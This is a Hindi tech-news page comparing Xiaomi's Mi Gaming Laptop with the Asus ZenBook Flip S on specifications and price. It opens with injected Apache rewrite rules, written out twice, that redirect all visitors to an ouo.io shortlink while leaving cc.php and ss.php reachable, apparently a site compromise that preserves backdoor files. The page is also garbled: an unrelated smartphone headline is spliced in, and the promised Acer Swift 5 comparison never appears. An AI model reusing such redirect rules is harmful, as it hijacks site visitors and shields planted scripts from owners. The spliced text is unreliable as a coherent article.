
RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]
BREAKING NEWS
Total views:- 385
Previousनई दिल्ली। शाओमी ने 'मी गेमिंग लैपटॉप' को लॉन्च कर दिया है। कंपनी ने चीन के शंघाई में हुए एक आयोजन में अपने इस लैपटॉप को लॉन्च किया है। हालांकि भारत में ये लैपटॉप कब लॉन्च होगा इसकी कंपनी ने अभी तक कोई जानकारी नहीं दी है। शाओमी 'मी गेमिंग लैपटॉप' प्रीमियम लैपटॉप में शामिल है। बताएंगे आपको लैपटॉप के फीचर्स के बारे में और ये भी की आसुस ‘जेनबुक फ्लिप एस’ और एसर ‘स्विफ्ट 5’ के मुकाबले ये कितना खरा उतरता है।
कीमत: ‘मी गेमिंग लैपटॉप’ की कीमत करीब 93,376 रुपये होगी।
डिस्प्ले: लैपटॉप में 15.6 इंच का फुलएचडी डिस्प्ले है। लैपटॉप में बहुत कम बैजल दिए गए हैं।
प्रोसेसर और ऑपरेटिंग सिस्टमलैपटॉप में 7th जेनरेशन का कोर आई7 प्रोसेसर लगा है। डिवाइस विंडोज 10 ऑपरेटिंग सिस्टम पर काम करता है।
रैम और स्टोरेज: शाओमी ने लैपटॉप को 2 वैरियंट में पेश किया है। इनमें, 16जीबी रैम के साथ 256जीबी की एसएसडी और 1टीबी की हार्ड डिस्क है। और दूसरे मॉडल में 8 जीबी रैम के साथ 128जीबी की एसएसडी और 1टीबी की हार्ड डिस्क शामिल है।
ग्राफिक्स: लैपटॉप में एनवीडिया का GeForce GTX 1060 GPU ग्राफिक्स दिया गया है।
दूसरे फीचर्स: डिवाइस में यूएसबी 3.0 पोर्ट, 2 यूएसबी -सी पोर्ट, एचडीएमआई और एक ऑडियो जैक है।
बेहतर रैम की होड़! शाओमी लांच करेगा 6 जीबी रैम और स्नैपड्रैगन 823 से लैस स्मार्टफोन
कीमत: आसुस ‘जेनबुक फ्लिप एस’ की कीमत 1,30,990 रुपये है।
डिस्प्ले: लैपटॉप में 13.3 इंच का फुलएचडी टच स्क्रीन डिस्प्ले है। इसके डिस्प्ले का रेजोल्यूशन 1920×1080 पिक्सल है। लैपटॉप की स्क्रीन का एस्पेक्ट रेशियो 16:9 है। लैपटॉप में पतले बैजल्स हैं। आसुस इसे नैनौ एज डिजाइन कहता है।
डायमेंशन और भार: लैपटॉप 11.2 मिलिमीटर मोटा है। इसका भार 1.1 किलो है।
प्रोसेसर और ऑपरेटिंग सिस्टम: लैपटॉप में 8th जेनरेशन का कोर आई7 प्रोसेसर लगा है। डिवाइस विंडोज 10 ऑपरेटिंग सिस्टम पर काम करता है।
रैम और स्टोरेज: लैपटॉप में 16 जीबी की LPDDR3 रैम लगी है। इसके साथ इसमें 512 जीबी का SATA3 SSD इंटरनल स्टोरेज दिया गया है।
ग्राफिक्स: डिवाइस में इंटेल यूएचजी ग्राफिक्स 620 का ग्राफिक्स लगा है। इससे गैम और डिजाइन पसंद करने वाले यूजर्स को ज्यादा विकल्प मिलेगा।
बैटरी: लैपटॉप एक बार चार्ज करने पर 11 घंटे का बैकअप देता है।